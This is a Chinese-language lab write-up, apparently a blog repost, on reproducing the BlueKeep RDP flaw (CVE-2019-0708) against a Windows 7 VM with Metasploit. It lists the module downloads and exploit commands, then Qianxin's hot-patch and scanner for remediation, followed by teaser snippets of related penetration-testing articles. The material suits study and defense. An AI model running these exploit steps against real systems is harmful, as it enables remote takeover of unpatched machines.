CVE-2019-0708 远程桌面代码执行漏洞复现

2023-11-03

0X00 靶机

漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统,一下就ojbk,你们没有,就下载装吧!
使用VM安装Windows7 SP1模拟受害机
Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

0x01 MSF的折腾

我是**msf5 **
msfconsole...先启动起来吧!

下载exp:

首先,我们需要下载好攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

做如下替换(看你的msf装在哪个目录吧!别瞎换!)

cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

msf启动起来了,reload_all发现那几个exp没进去,需要升级msf

msfupdate
在这里插入图片描述
按照提示走一波

apt update
apt install metasploit-framework

最后再去执行reload就ojbk了

realod_all

0x02 漏洞利用

use exploit/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.101
set target 3
exploit

成功利用!
在这里插入图片描述

0x03 漏洞检测修复工具&批量快速扫描检测工具&热补丁工具

(来源奇安信公众号)

使用说明

下载页面:
https://www.qianxin.com/other/CVE-2019-0708
使用说明:

1、 下载文件进行解压。
2、 使用win+R快捷键或开始菜单选择“运行”,输入cmd。调起命令行工具。
3、 在命令行工具,执行命令到工具所在文件夹
4、 输入命令对应功能,启用热补丁命令:QKShield.exe /enable ;禁用热补丁命令:QKShield.exe/disable 。
5、 重启系统后,需要重新运行命令行来启用热补丁

实现效果:
在工具支持的系统中启用热补丁后,用漏洞扫描工具扫描结果为没有漏洞。漏洞扫描工具下载地址:https://www.qianxin.com/other/CVE-2019-0708
支持系统:
Windows XP for 32-bit Systems Service Pack 3
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2003 for 32-bit Systems Service Pack 2
Windows Server 2003 R2 for 32-bit Systems Service Pack2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack2
Windows Server 2008 for x64-based Systems Service Pack2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems ServicePack 1
Windows Server 2008 R2 for x64-based Systems ServicePack 1 (Server Core installation)
暂不支持的系统:
Windows Server 2003 for x64-based Systems Service Pack2
Windows Server 2008 for Itanium-Based Systems ServicePack 2
Windows Server 2008 R2 for Itanium-Based SystemsService Pack 1

  • 参考链接

http://www.nmd5.com/?p=409
https://www.qianxin.com/other/CVE-2019-0708

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

CVE-2019-0708 远程桌面代码执行漏洞复现 的相关文章

  • Web安全—CSRF漏洞利用(pikachu)

    Web安全 CSRF漏洞利用 前言 xff1a 此篇文章主要记录pikachu靶场漏洞中三种模式的CSRF漏洞的利用 xff0c 此处不对基本原理进行过多赘述 xff0c 基础可参考文章 xff1a Web安全 跨站请求伪造攻击 xff08
  • 泛微移动平台e-mobile漏洞利用

    泛微移动平台e mobile漏洞利用基本信息 漏洞情报编号 xff1a vulbox intel 15244 是否可自动化组件 xff1a 是 CVE ID xff1a 暂无 发布日期 xff1a 2022 04 01 15 48 45 C
  • KB2871997补丁绕过

    KB2871997补丁绕过 微软为了防止用户的明文密码在内存中泄露 发布了KB2871997补丁 关闭了Wdigest功能 Windows Server2012及以上版本默认关闭Wdigest 使攻击者无法从内存中获取明文密码 Window
  • Typora 远程代码执行漏洞(CVE-2023-2317)

    1 漏洞介绍 Typora是一款编辑器 Typora 1 6 7之前版本存在安全漏洞 该漏洞源于通过在标签中加载 typora app typemark updater update html 可以在Typora主窗口中加载JavaScri
  • 防范明文密码和散列值抓取

    一 单机密码抓取的防范方法 微软为了防止用户密码在内存中以明文形式泄露 发不了补丁KB2871997 关闭了Wdigest功能 windows server 2012以上版本默认关闭Wdigest 使攻击者无法从内存中获取明文密码 对于wi
  • 渗透测试-01信息收集

    0x01信息收集 1 什么是信息收集 信息收集是指通过各种方式获取所需要的信息 以便我们在后续的渗透过程更好的进行 比如目标的站点IP 中间件 脚本语言 端口 邮箱等等 信息收集包含资产收集但不限于资产收集 2 信息收集的意义 1 信息收集
  • 看完这篇 教你玩转渗透测试靶机vulnhub——DC7

    Vulnhub靶机DC7渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 Vulnhub靶机漏洞详解 信息收集 SSH登入 漏洞发现与利用 提权 获取flag Vulnhub靶机渗透总结 Vulnhub靶
  • Windows系统提权姿势

    windows系统提权 权限提升简介 权限提升概述 什么是提权 提权分类 提权条件 Windows提权思路 Windows系统提权 Windows提权信息收集 WMIC信息收集 自动信息收集 提权工具脚本 环境搭建 提权 Windows内核
  • CVE-2019-0708 远程桌面代码执行漏洞复现

    0X00 靶机 漏洞环境 我当时就是虚拟机装了Windows7 SP1的系统 一下就ojbk 你们没有 就下载装吧 使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接 这里的靶机是使用清水表哥提供的win7sp
  • powershell cs-UTF-16LE编码上线

    0x01前言 当我们要上线主机的时候 可能会因为你的代码含有木马字符串 导致无法上线 0x02问题 1 例子 powershell exe exec bypass encodedCommand ZQBjAGgAbwAgACIAMQAyADM
  • 内网渗透——内网信息收集

    目录 一 内网信息收集简介 1 对当前机器角色进行判断 2 对当前机器所处网络环境及拓扑结构进行判断分析 3 对当前机器所处区域进行判断 二 本机信息收集 1 手动收集 2 相关查询命令 1 获取本机网络配置信息 2 操作系统和软件信息 1
  • Java RMI 远程代码执行漏洞

    0x01 漏洞描述 Java RMI 远程代码执行漏洞 Java RMI服务是远程方法调用 是J2SE的一部分 能够让程序员开发出基于JAVA的分布式应用 一个RMI对象是一个远程Java对象 可以从另一个Java虚拟机上 甚至跨过网络 调
  • 记一次从web到内网的渗透

    记一次从web到内网的渗透 拓扑图 环境介绍 现在有三台机器 分别为target1 target2 target3 里面分别有三个flag 每个flag的分值不同 需要通过拿下一个已知IP target1 进而向内网里面进行渗透 最终要成功
  • kerberos认证过程

    KDC Key Distribution Center 密钥分发中心 里面包含两个服务 AS和TGS AS Authentication Server 身份认证服务 TGS Ticket Granting Server 票据授予服务 TGT
  • 后渗透系列之windows文件下载

    后渗透系列之windows文件下载 不知道你们在进行渗透时会不会遇到这样的问题 在进行后渗透时linux系统是可以使用wget命令进行文件下载的 在真实的渗透环境下往往拿到的都只是windows系统的一个命令行 那windows系统怎么做到
  • ATK&ck靶场系列二

    信息收集 nmap sP 192 168 111 0 24 nmap sS T4 A v p 192 168 111 80 nmap sS T4 A v p 192 168 111 80 Starting Nmap 7 93 https n
  • 文件包含漏洞file_include

    什么是文件包含 程序开发人员通常会把可重复使用的函数写到单个文件中 在使用某些函数时 直接调用此文件 无需再次编写 这种调用文件的过程一般被称为文件包含 几个文件包含函数及特点 include函数 当使用该函数包含文件时 只有代码执行到 i
  • PWN保护机制以及编译方法

    0x00 声明 以下内容 来自先知社区的作者逆向萌新原创 由于传播 利用此文所提供的信息而造成的任何直接或间接的后果和损失 均由使用者本人负责 长白山攻防实验室以及文章作者不承担任何责任 0x01前言 Ctf中的pwn题 在利用gcc编译的
  • 【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】

    拓扑图 Windows系统散列值获取 1 通过CS模块获取用户凭证信息 在获取到目标主机权限后 我们可以抓取hash和dump明文密码 这两项功能都需要管理员权限 如果权限不足 先要进行提权操作 抓取密码哈希 右键被控主机 gt Acces
  • [系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解

    您可能之前看到过我写的类似文章 为什么还要重复撰写呢 只是想更好地帮助初学者了解病毒逆向分析和系统安全 更加成体系且不破坏之前的系列 因此 我重新开设了这个专栏 准备系统整理和深入学习系统安全 逆向分析和恶意代码检测 系统安全 系列文章会更

随机推荐

  • SSM框架笔试题(2)

    文章目录 1 对比jdbc请简述Mybatis框架的好处有哪些 2 简述Spring的AOP 并说明其应用场景有哪些 3 介绍一下 ResponseBody注解 4 简述SpringMVC执行流程 5 mybatis 和 有什么区别 6 简
  • 禁用电子邮件服务器,启用或禁用对邮箱中的邮箱的 POP3 或 IMAP4 Exchange Server

    启用或禁用对邮箱中的邮箱的 POP3 或 IMAP4 Exchange Server 2021 6 1 本文内容 在 Exchange 服务器上启用和配置 POP3 或 IMAP4 如在 Exchange 服务器上启用和配置POP3和在 E
  • 说说对npm的开发模式和生产模式的理解

    nodejs这些年的发展非常快 相信没有哪个前端不知道的了 npm也成为了前端开发中经常用到了的一个命令 那么npm不是只用一个 npm install xxx 命令就够了吗 实际上并不是这样 发现有些团队在使用npm的时候没有认真去搞懂n
  • Web自动化测试11:Selenium之frame切换、多窗口切换

    更多功能测试以及全套学习路线图均在专栏 戳进去领取 Web自动化测试01 认识web自动化在什么项目中适用 Web自动化测试02 Web自动化测试工具选择大全 Web自动化测试03 Selenium安装配置 详细教程 Web自动化测试04
  • Java 后端工程师的书单推荐

    拒绝盗版 从你我做起 源码圈 众胖友协作完成 希望书单能在你想要进一步打怪升级的路上 给予些许帮助 建议先收藏本书单 认真啃完一本再买下一本 扎实走完每一步 部分书籍关联相关博客和微信公众号 让你更嗨皮 如果对你略有帮助 烦请分享给你的基友
  • Linux 内存管理

    文章目录 前言 连续分配 单一连续分配 分区式分配 固定分区分配 动态分区分配 可重定位分区分配 离散分配 分段 分页 多级页表 快表 TLB 段页式 Linux 前言 Linux 内存管理 虚拟内存管理 虚拟内存空间 虚拟内存分配 Lin
  • SpringBoot如何使用WebSocket+jsch实现前后端交互获取服务器log并返回前端?

    一 导入依赖
  • [阶段4 企业开发进阶] 5. Netty新编

    文章目录 1 NIO 基础 1 1 NIO 三大组件 Channel Buffer Selector 1 2 ByteBuffer 总结ByteBuffer用法 ByteBuffer结构 调试工具类 常见方法 分散读取 集中写入 粘包半包
  • 解决element-ui的tab栏切换样式的问题

    1 出现如上情况 用element ui同样也可以实现 2 实现难度在于 用css画出来的三角可以实现 三十由于父盒子宽度不够 会被默认隐藏 此时我们需要抬高下划线和三角形 如何用伪类让后面的线也抬高 代码如下 v deep thing t
  • 在linux上强制停止进程应该用哪个命令,如何在Linux系统中使用命令终止无响应进程...

    有多种工具可用于从命令行终止无响应或挂起的进程 包括kill pkill和killall 这些命令通过向这些无响应的进程发送特定信号来工作 您将需要进程ID或PID信息 以便可以向他们发送所需的终止信号 您可以使用命令来检索无响应进程的PP
  • java两个jsonobject对象合并_Java:将两个json对象与主键合并在一起

    假设我在内存中有两个 JSONObject数组 每个对象都有一个在两个数组中相似的键 数组1 name Big Melons Co location Inner City Dubai id 1A name Pear Flavored Jui
  • CGI与FastCGI

    当我们在谈到cgi的时候 我们在讨论什么 最早的Web服务器简单地响应浏览器发来的HTTP请求 并将存储在服务器上的HTML文件返回给浏览器 也就是静态html 事物总是不 断发展 网站也越来越复杂 所以出现动态技术 但是服务器并不能直接运
  • [激光原理与应用-48]:《焊接质量检测》-5-德擎先进激光过程诊断系统ALPAS分析

    目录 第1章 概述 第2章 产品特性与功能 2 1 传感器 2 2 主机数据分析系统 第3章 工作原理 第4章 系统组成 第5章 案例分析 第1章 概述 先进激光过程诊断系统 ALPAS Advanced Laser Process Ass
  • 高德地图key验证失败:[INVALID_USER_SCODE]

    高德地图key验证失败 INVALID USER SCODE key错误 错误出现原因 如果是在非打包情况下 电脑直接安装 调试 调试版安全码SHA1 一定要填写 否则会报key错误 不填只能打包成apk文件再安装 如果修改了依然报错 那么
  • 解决垃圾回收难题,提升Android应用性能的技巧

    Android应用程序在运行过程中可能会遇到内存溢出 Memory Out of Bounds 和内存泄漏 Memory Leak 的问题 这些问题会导致应用程序性能下降 响应变慢甚至崩溃 内存溢出 Memory Out of Bounds
  • springboot部署到服务器遇到的SSL证书问题

    错误 javax net ssl SSLException java lang RuntimeException Unexpected error java security InvalidAlgorithmParameterExcepti
  • Pycharm使用教程 (非常实用)

    一 PyChram下载 官网 http www jetbrains com pycharm Windows http www jetbrains com pycharm download section windows Linux http
  • 【STL】模板概念+STL介绍

    模板 Template 模板就是C 实现代码重用机制的一种工具 它可以实现类型参数化 即把类型定义为参数 从而实现了真正的代码可重用性 可以使用模板来定义函数和类 当你定义一个如下函数 想要计算一个数的平方 int square int x
  • sql中用什么替代in

    IN和EXISTS 有时候会将一列和一系列值相比较 最简单的办法就是在where子句中使用子查询 在where子句中可以使用两种格式的子查询 第一种格式是使用IN操作符 where column in select from where 第
  • CVE-2019-0708 远程桌面代码执行漏洞复现

    0X00 靶机 漏洞环境 我当时就是虚拟机装了Windows7 SP1的系统 一下就ojbk 你们没有 就下载装吧 使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接 这里的靶机是使用清水表哥提供的win7sp